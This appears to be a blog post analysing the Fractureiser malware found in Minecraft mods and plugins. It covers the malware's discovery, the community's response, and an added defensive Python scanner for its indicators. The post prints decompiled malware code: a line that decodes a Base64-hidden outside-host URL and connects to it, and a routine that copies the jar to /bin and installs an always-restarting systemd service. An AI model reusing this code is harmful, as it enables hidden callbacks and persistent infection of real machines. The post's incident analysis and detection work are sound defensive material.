The Devastating Fractureiser: Minecraft's Malware Outbreak

In Minecraft, a new threat has emerged: a malware strain known as "Fractureiser" has been causing havoc, infecting mods and spreading. This blog post aims to shed light on this devastating outbreak, providing an in-depth analysis of the malware, its impact, and the steps the community took to combat it.

The Emergence of Fractureiser

The Fractureiser malware was first discovered when a Minecraft server hosting company, MCHost.no, was contacted by a customer reporting that his server was not starting correctly. The server would freeze while loading the plugins, a symptom that usually indicates a faulty or incompatible plugin. However, after several days of back and forth, it was discovered that the issue was much more severe: the customer's plugins were infected with a "virus" that he had unknowingly downloaded from a shady source [1].

The malware was traced back to a class file named "Updater.Class" found in the infected plugins. The file was obfuscated and could not be decompiled with standard tools, making its functionality difficult to understand [1]. Further investigation revealed that the malware connected to a remote host via an encoded URL [1].

The Fractureiser's Modus Operandi

The Fractureiser malware operates by infecting Minecraft mods and spreading across servers. It uses a class file named "Updater.Class" to infect plugins and then connects to a host via an encoded URL [1]. The malware also installs itself for continued access, making it challenging to remove [1].

The malware is particularly dangerous because it can spread across servers. On MCHost.no, however, each Minecraft server runs in its own Docker container, so the infection stayed isolated and could not spread between servers [1].

The Community's Response

In response to the outbreak, the Minecraft community took several steps to combat the Fractureiser malware. A detection tool was developed to help users identify whether their computer has been infected [2]. The tool checks the user's system and lists the detected files [2]. If an infection is found, the user is advised to delete the infected files and run independent malware scanning tools [2].

In addition to the detection tool, a scanning tool was developed to find dormant or otherwise infected mods and Jar files [2]. It scans for the stage 0 infection and can detect infected Jars [2].

The Impact of the Fractureiser Malware

The impact of the Fractureiser malware has been significant, with several mods being infected and taken down permanently [2]. The malware has also infected several Bukkit plugins [2]. At the time of detection, the total non-unique downloads for some of the infected mods and plugins were in the hundreds, indicating the widespread nature of the infection [2].

The following code snippets are from the Fractureiser malware and provide insight into how it operates:

This snippet shows how the malware connects to a host via an encoded URL:

HttpURLConnection var2 = (HttpURLConnection)(new URL(new String(Base64.getDecoder().decode("aHR0cDovL2ZpbGVzLnNreXJhZ2UuZGUvdXBkYXRl")))).openConnection();

The URL is stored as a Base64 string, decoded at runtime and then used to open a connection. Keeping the URL encoded hides it from simple string matching, making it harder for security tools to detect and block the connection.

This snippet shows how the malware sets itself up for continued access:

// Copy of the running jar that will be launched by the systemd unit
File var0 = new File("/bin/vmd-gnu");
// Unit file that makes systemd start the copied jar and restart it forever
File var1 = new File("/etc/systemd/system/vmd-gnu.service");
String var2 = "[Unit]\nDescription=vmd-gnu local service\nAfter=network.target\nStartLimitIntervalSec=0\n\n[Service]\nType=simple\nRestart=always\nRestartSec=1\nUser=" + System.getProperty("user.name") + "\nExecStart=/bin/sh -c \"java -Dauto=true -jar /bin/vmd-gnu\"\n\n[Install]\nWantedBy=multi-user.target";
// Location of the jar this class was loaded from, i.e. the malware itself
URL var3 = O.class.getProtectionDomain().getCodeSource().getLocation();
Files.copy((new File(var3.getFile())).toPath(), var0.toPath(), StandardCopyOption.REPLACE_EXISTING);
Files.write(var1.toPath(), var2.getBytes(), new OpenOption[0]);
Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "systemctl enable vmd-gnu"}).waitFor();
Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "systemctl start vmd-gnu"}).waitFor();

The malware sets itself up for continued access by registering a new system service. It copies itself to "/bin/vmd-gnu" and writes a unit file to "/etc/systemd/system/vmd-gnu.service". The unit is configured with Restart=always, so the malware stays active even if the system is rebooted or the process is killed. The service runs as the current user, so it can perform actions with that user's privileges. Note that writing to "/bin" and "/etc/systemd/system" normally requires root, so this persistence step only succeeds when the Minecraft server itself runs with elevated privileges.
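The detection and scanning tools mentioned above are not reproduced here; the following is an added example (not the community's tool or the malware's code) that turns the indicators quoted on this page into a small defensive scan: it decodes the Base64 URL constant, searches jar entries for that constant, its decoded form, the "vmd-gnu" service name and the "Updater.class" entry name, and checks for the dropped binary and systemd unit. Function names and the constructed sample jars are mine; the filesystem root is a parameter so the demo runs against a temporary directory.

```python
import base64
import os
import tempfile
import zipfile

# Indicators taken from the snippets quoted on this page.
ENCODED_URL = "aHR0cDovL2ZpbGVzLnNreXJhZ2UuZGUvdXBkYXRl"
PERSISTENCE_PATHS = ("bin/vmd-gnu", "etc/systemd/system/vmd-gnu.service")

def decode_indicator(b64: str) -> str:
    """Reverse the Base64 wrapping the malware uses to hide its URL."""
    return base64.b64decode(b64).decode()

def scan_jar(path: str) -> list:
    """Flag jar entries carrying the encoded URL, its decoded form, the service name, or the class name."""
    needles = (ENCODED_URL.encode(), decode_indicator(ENCODED_URL).encode(), b"vmd-gnu")
    hits = []
    with zipfile.ZipFile(path) as jar:
        for entry in jar.namelist():
            if entry.endswith("Updater.class"):
                hits.append(f"{entry}: suspicious class name")
            data = jar.read(entry)
            for needle in needles:
                if needle in data:
                    hits.append(f"{entry}: contains {needle.decode()}")
    return hits

def check_persistence(root: str = "/") -> list:
    """Report the dropped binary and systemd unit under root (hypothetical parameter for testing)."""
    return [p for p in PERSISTENCE_PATHS if os.path.exists(os.path.join(root, p))]

def demo() -> dict:
    """Build constructed clean and infected jars plus a fake unit file in a temp dir, then scan them."""
    root = tempfile.mkdtemp()
    infected, clean = os.path.join(root, "infected.jar"), os.path.join(root, "clean.jar")
    with zipfile.ZipFile(infected, "w") as jar:
        # Constructed stand-in for an infected class: not real bytecode, just the string constant.
        jar.writestr("com/example/Updater.class", b"\xca\xfe\xba\xbe" + ENCODED_URL.encode())
    with zipfile.ZipFile(clean, "w") as jar:
        jar.writestr("com/example/Mod.class", b"\xca\xfe\xba\xbe harmless")
    unit_dir = os.path.join(root, "etc/systemd/system")
    os.makedirs(unit_dir)
    with open(os.path.join(unit_dir, "vmd-gnu.service"), "w") as f:
        f.write("[Unit]\nDescription=vmd-gnu local service\n")  # constructed copy of the unit header
    return {"infected": scan_jar(infected), "clean": scan_jar(clean),
            "persistence": check_persistence(root)}

if __name__ == "__main__":
    print(demo())
```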

The Aftermath

The aftermath of the Fractureiser malware outbreak was intense activity within the Minecraft community. The hosting company, MCHost.no, took immediate steps to block the domain associated with the malware, thereby reducing its potential harm [1]. The customer whose server was initially infected had to reinstall all plugins and server.jar, but after these steps the server was no longer connecting to the malicious server [1].

The community also rallied to provide support and solutions, making the detection and scanning tools described above available to users so they could identify infected systems, dormant infected mods and Jar files, and remove the detected files [2].

Lessons Learned

The Fractureiser malware outbreak has served as a stark reminder of the potential threats that exist in the world of online gaming. It has highlighted the importance of downloading mods and plugins from trusted sources to avoid such issues in the future. The swift response of the Minecraft community in developing detection and scanning tools to combat the malware is commendable. It serves as an example of the power of community collaboration in the face of adversity.

The incident has also underscored the importance of vigilance and proactive measures in maintaining the security of online gaming environments. As the Fractureiser malware has shown, even seemingly harmless activities like downloading a Minecraft mod can have severe consequences if done without caution.

References

[1] Lars Jørgen Skattebo - Updater.class

[2] CurseForge Support - June 2023 - Infected mods detection tool